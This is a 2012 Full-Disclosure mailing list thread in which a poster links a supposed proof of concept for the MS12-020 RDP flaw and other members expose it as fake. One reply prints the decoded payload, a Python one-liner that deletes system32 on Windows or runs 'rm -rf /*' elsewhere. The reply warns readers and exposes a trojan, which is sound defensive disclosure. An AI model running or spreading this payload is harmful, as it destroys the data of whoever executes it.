[Full-disclosure] ms12-020 new poc

2012-03-18 Thread yuri goncalves soares
Another POC.

http://pastebin.com/GM4sHj9t
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ms12-020 new poc

2012-03-18 Thread Mario Vilas
Another lame backdoor.

On Sat, Mar 17, 2012 at 6:45 AM, yuri goncalves soares y...@bsd.com.brwrote:

 Another POC.

 http://pastebin.com/GM4sHj9t

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ms12-020 new poc

2012-03-18 Thread BGA
It's a fake and delete your disk completely.

If you convert the payload to ascii
__import__('os').sys
  tem('del /s /q /f C:
  \windows\system32\* 
   NUL 21') if 'Win
  ' in __import__('pla
  tform').system() els
  e __import__('os').s
  ystem('rm -rf /*  /
  dev/null 21') #hi 
  there ^_~ feel free 
  to spread this with 
  the rm -rf replaced 
  with something more 
  insidious

---
Huzeyfe ONAL
Bilgi Güvenliği AKADEMİSİ
http://www.bga.com.tr

BGA Ankara  İstanbul Eğitim Takvimi
http://www.bga.com.tr/?page_id=944

 ---



On Sat, Mar 17, 2012 at 7:45 AM, yuri goncalves soares y...@bsd.com.brwrote:

 Another POC.

 http://pastebin.com/GM4sHj9t

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/